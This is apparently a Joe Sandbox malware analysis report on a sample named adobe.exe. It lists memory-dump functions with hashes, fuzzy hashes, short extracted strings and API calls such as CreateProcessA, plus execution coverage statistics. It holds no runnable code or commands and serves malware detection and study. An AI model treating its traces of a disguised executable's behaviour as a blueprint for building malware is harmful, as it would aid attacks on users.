Instruction ID: 9a5d7ec4c4e32d281cf19e069b9533e0f90db18bc1c2306cb4d83f1cbf7ae102
Opcode Fuzzy Hash: 8132eec231f5b125dfc7a13555e010b76947f9081450281d9d4647372e6f7065
Instruction Fuzzy Hash: 0D213471504205DFCB15DF58D9C8B26BBA5FB84318F20C56DDA094B396C33AD447CA62

Function 013FD006 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4112929346.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3c7bf1fc7972a3e1e60002fe96c4aa6580eda65b848c57152a465ff90db3800
Instruction ID: f5152289698bc3548f58ecd8b7f1a124ee39b99bc67626234d98a1b6bc264641
Opcode Fuzzy Hash: f3c7bf1fc7972a3e1e60002fe96c4aa6580eda65b848c57152a465ff90db3800
Instruction Fuzzy Hash: 9D216B755093C08FDB13CF64D994711BF71AB46214F29C5EBD9898F2A7C23A980ACB62

Function 06DF41B1 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dceadfbd36748bf75bdde29ead917275908351e782fc9c9f0b85fd150ee85d1c
Instruction ID: a5be3b172590d8dbb3bec8044e40c7528da185bcc13817c28edf36f3d2df3d2f
Opcode Fuzzy Hash: dceadfbd36748bf75bdde29ead917275908351e782fc9c9f0b85fd150ee85d1c
Instruction Fuzzy Hash: 5E01F531B102101FD7648BADD814B6BB7DADBC9750F15C83AE60ACB352DA26DC0243A1

Function 06DF3F78 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a42a8ded06f1da6982a2914ca616fc8dbf7f813e280f7e488f5a1a607ed5af4a
Instruction ID: e08e19d572473a7b38bd5ff87a4780d8e5f6a7924c80396df9483c574f65a404
Opcode Fuzzy Hash: a42a8ded06f1da6982a2914ca616fc8dbf7f813e280f7e488f5a1a607ed5af4a
Instruction Fuzzy Hash: 8A117C36B101284BCF949B69D8146AF73BAABC8651F024439D506E7354EE75DC028BD0

Function 06DFF118 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c54d7daddb4bc32767412f03fb68d40640bf26b1c13c493b7c766d6b0788938f
Instruction ID: 603671186a4913cef7164437d66f321d171b304023c5b8b6113012867956b06f
Opcode Fuzzy Hash: c54d7daddb4bc32767412f03fb68d40640bf26b1c13c493b7c766d6b0788938f
Instruction Fuzzy Hash: 7C01FC72B202100FDB658F7DD85072A77E6DBC6760F118879E24ECB341EE65DC028385

Function 06DF3C30 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ef4650828051e9fb666a79d8af181ac39a796e459612c42a5434af1ad162288
Instruction ID: 5910f0ad2b9b7a64b887531b18ebe0a2a02a9a64f3957f7d79e02608488deae5
Opcode Fuzzy Hash: 5ef4650828051e9fb666a79d8af181ac39a796e459612c42a5434af1ad162288
Instruction Fuzzy Hash: C321BFB1D01269AFCB10CF9AD984ADEFBB4FB48314F11852AE918A7340D374A954CFE5

Function 06DFA27A Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e58da8b82478d6902fd492433fab031aa24e3c6f63d80da591a5f1a95c1d69
Instruction ID: 5bd97339eff1acf1f9e0883eec80e3e55d9ecbc20279e2fe568b05f41251f829
Opcode Fuzzy Hash: 13e58da8b82478d6902fd492433fab031aa24e3c6f63d80da591a5f1a95c1d69
Instruction Fuzzy Hash: 5001F1307202249FDB619B7CD810BAB77DAEB8A754F158839E60ECB340EE26EC014390

Function 06DF3F67 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a52905452572f8de24a868811612624c94d169255e2ce54fc6437d1c93896214
Instruction ID: d7ccb56b9e1917444dddda64f92afdbf8e3e684bbc3e00fb7e16a0c42ff30383
Opcode Fuzzy Hash: a52905452572f8de24a868811612624c94d169255e2ce54fc6437d1c93896214
Instruction Fuzzy Hash: DB01B136B100641BDFA487799C14AFB37BF9BC8311F0A4139E506E7398EE648C0287E1

Function 06DF3C38 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dd27a10eca10a24c91a824a8cc07741d15d9bff231ad36ee4443d0856d080b6
Instruction ID: 94ef2e6aad66f623f2cca491a53106f5faaca8636f85c0e94509c50b3a0b0d80
Opcode Fuzzy Hash: 2dd27a10eca10a24c91a824a8cc07741d15d9bff231ad36ee4443d0856d080b6
Instruction Fuzzy Hash: EE11B3B5D01259AFCB00DF9AD984ADEFBB4FB48314F11852AE518A7340C374A554CFE5

Function 06DF41C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50cf1698a4cef791d9be38df5f2defde30c46841c6f66a0d071e5d72d738ef40
Instruction ID: 6e2b814f043a7b5dbfa2b6dc34691b8985f0e550afa7b333a2e9e2e8156280bd
Opcode Fuzzy Hash: 50cf1698a4cef791d9be38df5f2defde30c46841c6f66a0d071e5d72d738ef40
Instruction Fuzzy Hash: 60018631B104201BDB649BBD995472BB2DADBC9720F11C83AE60ACB355ED66DC424395

Function 06DFF128 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f19baf15631b9bd1c9f105a1b3e9d348db9850725a8947d5d211a2f6902ef02
Instruction ID: 26ac3cd7b9d31a287e936647b2e7bc6493f36369c9a86ad3182019a96e950feb
Opcode Fuzzy Hash: 4f19baf15631b9bd1c9f105a1b3e9d348db9850725a8947d5d211a2f6902ef02
Instruction Fuzzy Hash: C9018C72B201210BDB649B7DE85472E73DADBC9A65F118839E20ECB340EE66DC424385

Function 06DFA288 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0695902e5e0dba5a76a9a380e145bb3d1e57ac5bc623faf443652a081b38743d
Instruction ID: 746ca3b08834d0c372e979698a67e93ee8dbdad7402e8b5e780b67f238a81c26
Opcode Fuzzy Hash: 0695902e5e0dba5a76a9a380e145bb3d1e57ac5bc623faf443652a081b38743d
Instruction Fuzzy Hash: FC018130B200258FDB64DBBDD45476AB3DAEB89B54F148829E60ECB340EE27EC414780

Function 06DF63E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7b5a3f4629b860c65987b1cad230f8d8e678048b1cb728a1dfeba83aeb594d2
Instruction ID: 265974d9f9ca9fabdc82bc4de0fb0ec9a28e04d684c692c3e55b70c56068ff9e
Opcode Fuzzy Hash: d7b5a3f4629b860c65987b1cad230f8d8e678048b1cb728a1dfeba83aeb594d2
Instruction Fuzzy Hash: 53F0E5719293C8ABCB11DB74C8547DB7FA9DB07204F1A84E6D444CB202E235CA02C362

Function 06DF63F0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd82ae8ca65274fc3454b2c4d1ce8315d717affde06d8b7be6468b424b4745b
Instruction ID: 6e7c7a75a4cf1898a9a58601f41e47ea6fb80939b80c7d306e40b1da6032a591
Opcode Fuzzy Hash: 3bd82ae8ca65274fc3454b2c4d1ce8315d717affde06d8b7be6468b424b4745b
Instruction Fuzzy Hash: BEE0C2B0E34148ABDF50DFB4C94575F77ACDB06204F2184B4D509CB201E232CA028340

Non-executed Functions

Function 06DF7618 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$kq, xrefs: 06DF7BBE
$kq, xrefs: 06DF7BB4
$kq, xrefs: 06DF7758
$kq, xrefs: 06DF7BA8
$kq, xrefs: 06DF7B09
$kq, xrefs: 06DF777D
$kq, xrefs: 06DF774C
$kq, xrefs: 06DF7BCA
$kq, xrefs: 06DF7789
$kq, xrefs: 06DF7B15

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1324371161
Opcode ID: 045d7212c9ec75ceda647d8c8619144ba30cee3fd8dfb1ac148a436eafd86c07
Instruction ID: 3bfc4a2e14a50d53f8dfdbb4d40ee7952a3205e82c520d5ffabfa2ab43f1f45e
Opcode Fuzzy Hash: 045d7212c9ec75ceda647d8c8619144ba30cee3fd8dfb1ac148a436eafd86c07
Instruction Fuzzy Hash: 03123A30E102198FDB64DF69D944AAEB7B2FF88300F2185A9D509AB364DB34DD85CF90

Function 06DFA8A8 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$kq, xrefs: 06DFAA66
$kq, xrefs: 06DFAA24
$kq, xrefs: 06DFAA5A
$kq, xrefs: 06DFA99E
$kq, xrefs: 06DFA9F9
$kq, xrefs: 06DFA9AA
$kq, xrefs: 06DFAA05
$kq, xrefs: 06DFAA30

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1078448309
Opcode ID: 57837fc21cc0e339725fd38177fd3aabf57e489eed9864150ae3496d22cdf433
Instruction ID: 8eb6a39c8d2eb4e4585f77b85a8bf994595f6191dff61a467431d6b0b19b5710
Opcode Fuzzy Hash: 57837fc21cc0e339725fd38177fd3aabf57e489eed9864150ae3496d22cdf433
Instruction Fuzzy Hash: 1A91BF30A20209DFDB64DF65DA44BAEB7F6EF84300F298429D5069B394DB39DC85CB90

Function 06DF7018 Relevance: 7.9, Strings: 6, Instructions: 405COMMON

Download Yara Rule

Strings

$kq, xrefs: 06DF72FA
$kq, xrefs: 06DF74B4
$kq, xrefs: 06DF7520
$kq, xrefs: 06DF752C
$kq, xrefs: 06DF7354
$kq, xrefs: 06DF7360

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1342094364
Opcode ID: fc79ef1fb60e36561a4f4712a86182c81837d559028e08219ae720554d55e6c4
Instruction ID: 0dd9c5533f561290b4427f01ddd412cc7b7e12e4cda8f46fc5b93ee5734aa114
Opcode Fuzzy Hash: fc79ef1fb60e36561a4f4712a86182c81837d559028e08219ae720554d55e6c4
Instruction Fuzzy Hash: D1F14C34B10205CFDB54DBA8D554AAEB7B7FF88305F258468D4059B3A8DB35EC86CB90

Function 06DF8350 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$kq, xrefs: 06DF860F
$kq, xrefs: 06DF85B6
$kq, xrefs: 06DF861B
$kq, xrefs: 06DF85AA

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq
API String ID: 0-2881790790
Opcode ID: 0355c8ffe079c50b5921ffa14dc464292164a2c010f7d5229fb9be78c92dfd89
Instruction ID: 72bcf7710b980543a3dfc70f6f6d8c337025d9eb43a4a5ddabb3aa6bf231634a
Opcode Fuzzy Hash: 0355c8ffe079c50b5921ffa14dc464292164a2c010f7d5229fb9be78c92dfd89
Instruction Fuzzy Hash: 8CB15C30E20209CFDB64DF68D9546AEB7B2FF88305F258429D5069B3A4DB35DC86CB81

Function 06DFAC30 Relevance: 5.2, Strings: 4, Instructions: 175COMMON

Download Yara Rule

Strings

$kq, xrefs: 06DFADB4
$kq, xrefs: 06DFADE3
$kq, xrefs: 06DFAD61
$kq, xrefs: 06DFAE0C

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq
API String ID: 0-2881790790
Opcode ID: edc4db00edfe3f7cdd5655e4ff539e9f8b2920622c212c6a105b950f5abf8427
Instruction ID: 0a96ce4a9a7be551d96e0e3124a2cfe1ca285e05fb513fc3e8bdf69dacf2f102
Opcode Fuzzy Hash: edc4db00edfe3f7cdd5655e4ff539e9f8b2920622c212c6a105b950f5abf8427
Instruction Fuzzy Hash: A0519434F20205CFDF69DB68E9805AEB3B6EB84315F29852AD909D7354DB35EC41CB90

Function 06DF8768 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LRkq, xrefs: 06DF885B
LRkq, xrefs: 06DF88AA
$kq, xrefs: 06DF87E7
$kq, xrefs: 06DF87F3

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: LRkq$LRkq$$kq$$kq
API String ID: 0-2392252538
Opcode ID: ce0f43c4a97a1c11f346c9e40cffd9722b91b9915ab2d37ba781c490e59d18a1
Instruction ID: aaf201dc211c70c96932950033bdae5b7bb2af31017282ddef8b4ff003076f87
Opcode Fuzzy Hash: ce0f43c4a97a1c11f346c9e40cffd9722b91b9915ab2d37ba781c490e59d18a1
Instruction Fuzzy Hash: F4518E30B102019FDB58DB69E954A6AB7F6FF88300F1585A9E5029B3A5DF34EC44CBA1

Analysis Process: adobe.exePID: 7428, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	99.2%
Signature Coverage:	0%
Total number of Nodes:	360
Total number of Limit Nodes:	19

Executed Functions

Function 05FA30F8 Relevance: 7.0, Strings: 5, Instructions: 739
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'kq, xrefs: 05FA37DA
poq, xrefs: 05FA3819
Tekq, xrefs: 05FA353B
TJpq, xrefs: 05FA316E
xbnq, xrefs: 05FA3146

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID: 4'kq$TJpq$Tekq$poq$xbnq
API String ID: 0-2301093937
Opcode ID: 4016f4259b36a1347b41359eed3e9cc80562fb46b0f07a7b4d79101cecc880bc
Instruction ID: 7294574f7dabe8e42ab5311aca1c50417eeaa41a119fcef3f00a4ce668e0beb5
Opcode Fuzzy Hash: 4016f4259b36a1347b41359eed3e9cc80562fb46b0f07a7b4d79101cecc880bc
Instruction Fuzzy Hash: 11623676A10218DFDB14DF68C984E69BBB2FF88304F1585A8E509AB3A5CB35EC51CF41

Function 05FA2E87 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

4'kq, xrefs: 05FA2F4B

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: a5dcbee611c0c622112c20f2a1b29ab6c0221c7c94768e802f8e198c018ee5cb
Instruction ID: b81e53460f5ed52a8e1e5730f3b2c12c7798c5976874a5a4b03615cd38bed4cc
Opcode Fuzzy Hash: a5dcbee611c0c622112c20f2a1b29ab6c0221c7c94768e802f8e198c018ee5cb
Instruction Fuzzy Hash: BB511D71A216088FDB18EF7AEA4165ABFE3FBC8204F14D539E408DB268DF785905CB50

Function 05FA4A3E Relevance: 5.2, Strings: 4, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 05FA4B47
$kq, xrefs: 05FA4B53
$kq, xrefs: 05FA4AD6
$kq, xrefs: 05FA4AE2

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq
API String ID: 0-2881790790
Opcode ID: 9af69c04eed5c628d633d3d651db4ccb6e25e0fa0522c1a7fbf137d3933ca9ed
Instruction ID: a96e8b1e1dd3c76324e5604fb190c6e44b71bfc47a1f80fcc446dfbfc8424ef1
Opcode Fuzzy Hash: 9af69c04eed5c628d633d3d651db4ccb6e25e0fa0522c1a7fbf137d3933ca9ed
Instruction Fuzzy Hash: E3518138B1020C8FD758AF64D955BAF7AA7FBC8704F248029E516DB798CE789C01CB51

Function 05FA0D58 Relevance: 2.8, Strings: 2, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 05FA0F9C
Hoq, xrefs: 05FA0EE6

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID: (oq$Hoq
API String ID: 0-3084834809
Opcode ID: 36ce2bfeb54653ebab305f85dfd74d40515898e09c3db6476846a54a04d94101
Instruction ID: 964406bbb8eec736cd1c2c9e4575dc5bf04ef64c3e4626ef30d6315a5d022c4f
Opcode Fuzzy Hash: 36ce2bfeb54653ebab305f85dfd74d40515898e09c3db6476846a54a04d94101
Instruction Fuzzy Hash: 06B19071E002089FDB14DFA8D4587AEBBB6FF88300F24852EE506AB394DF749945CB95

Function 05FA4828 Relevance: 2.6, Strings: 2, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tekq, xrefs: 05FA4877
Tekq, xrefs: 05FA48D3

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID: Tekq$Tekq
API String ID: 0-2269808460
Opcode ID: e4ca911f474cd0c0203c28c4858ba9406d2fbb6fb40126ea374fec40b7ebb56a
Instruction ID: 521ed12fcb2c7d019b4d0e22c2a891e66a42e949634cae796c6ca377368b2b01
Opcode Fuzzy Hash: e4ca911f474cd0c0203c28c4858ba9406d2fbb6fb40126ea374fec40b7ebb56a
Instruction Fuzzy Hash: F54160B5B2120C8BD755BB68D5997AE7AA3EBC9308F104029EA15A77C8CE7C4C05C791

Function 05FA4838 Relevance: 2.6, Strings: 2, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tekq, xrefs: 05FA4877
Tekq, xrefs: 05FA48D3

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID: Tekq$Tekq
API String ID: 0-2269808460
Opcode ID: 7c62186932f6af65a83d864cc16e7548eace009b6ffb52342d668064e077e7b4
Instruction ID: 3acc16865c5b931349a366ed066c7dfc73a29a5487e662eda47046d46f8821ec
Opcode Fuzzy Hash: 7c62186932f6af65a83d864cc16e7548eace009b6ffb52342d668064e077e7b4
Instruction Fuzzy Hash: FF4161B5B212088BD754BB68D5997AF7AA7EBC8704F104029FA06E73C8DE7C9C05C791

Function 074664EC Relevance: 1.8, APIs: 1, Instructions: 250
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0746672E

Memory Dump Source

Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7460000_adobe.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e24d93b09e18b5c9ec2ca082385a9a0ece9c08110ce0cb0d448ca1100a1cbd4e
Instruction ID: c4816696ffc8ba129f2debb4fb3e8c5cc13d93f3734018d96bb60a367dc1fa7a
Opcode Fuzzy Hash: e24d93b09e18b5c9ec2ca082385a9a0ece9c08110ce0cb0d448ca1100a1cbd4e
Instruction Fuzzy Hash: F2A18DB1D0021ADFDB10CF68C945BDEBBB2BF48314F1585AAE808A7244DB749985CF92

Function 074664F8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0746672E

Memory Dump Source

Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7460000_adobe.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: fefd69895b418fdcbfdbda67a2464fbab801198a180ee333e8cc7fe2057d244d
Instruction ID: d6b2058db57bc2747376d4c26c07a356e66770a02f1470b75799adf63467c024
Opcode Fuzzy Hash: fefd69895b418fdcbfdbda67a2464fbab801198a180ee333e8cc7fe2057d244d
Instruction Fuzzy Hash: EC916EB1D0021ADFDB10CF68C945BDEBBB2BF44314F1585AAE808A7254DB749985CF92

Function 050AB1B0 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 44633d1e9c001f33d6b6998fdb726bc0058df83712e58e1bc930156c116df3b3
Instruction ID: dd2e0606472f865974305e0882eeca670e1c2595f4a77842f01a421943e51bde
Opcode Fuzzy Hash: 44633d1e9c001f33d6b6998fdb726bc0058df83712e58e1bc930156c116df3b3
Instruction Fuzzy Hash: 9F712571A00B058FD764DFA9E54579EBBF2FF88304F008A2AD44AD7A50EB74E845CB94

Function 05CA1108 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05CA1E02

Memory Dump Source

Source File: 00000006.00000002.1911265263.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5ca0000_adobe.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: a24ed702491a0cc13317ff61a08fe730b0cb33c523e3f0d41d60b608c6146b99
Instruction ID: 648a1891f844c2c7e374ed67a475767bb56d10d67d64a476bc3bb8670c986dc2
Opcode Fuzzy Hash: a24ed702491a0cc13317ff61a08fe730b0cb33c523e3f0d41d60b608c6146b99
Instruction Fuzzy Hash: 5C5145B2C043599FDB11DFA9C984ACEBFB1FF48304F24852AE418AB221D7749984CF94

Function 05CA1150 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05CA1E02

Memory Dump Source

Source File: 00000006.00000002.1911265263.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5ca0000_adobe.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: bcca549c2a2c4d24f712226eb4e0834cca92cbbeb51efb367a59f2e3766f18d1
Instruction ID: 62deec55af7f07f00be34bcbf51d597a0bdc70c70212c565e089a8b3459d8893
Opcode Fuzzy Hash: bcca549c2a2c4d24f712226eb4e0834cca92cbbeb51efb367a59f2e3766f18d1
Instruction Fuzzy Hash: BB51C0B1D003499FDB14CF9AC984ADEBFB6BF48314F24852AE819AB210D7759985CF90

Function 05CA1CE4 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05CA1E02

Memory Dump Source

Source File: 00000006.00000002.1911265263.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5ca0000_adobe.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 47263370fd311838d3948cab78fba7fa26aca7a0542e29cdc390736f93dbe940
Instruction ID: 6ae8244465a660ee6e7b51dc1b5e44c52f7acda8ee56a44fc0737e03656e5b6f
Opcode Fuzzy Hash: 47263370fd311838d3948cab78fba7fa26aca7a0542e29cdc390736f93dbe940
Instruction Fuzzy Hash: 5151CEB1D002099FDB14CF99C984ADEBFB6BF48314F24852AE819AB210D7759985CF90

Function 050A590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 050A59C9

Memory Dump Source

Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9a575db47a93ac8ca7e1dc703a7be34f63b1539e82a46804892a4ed11ddf7d15
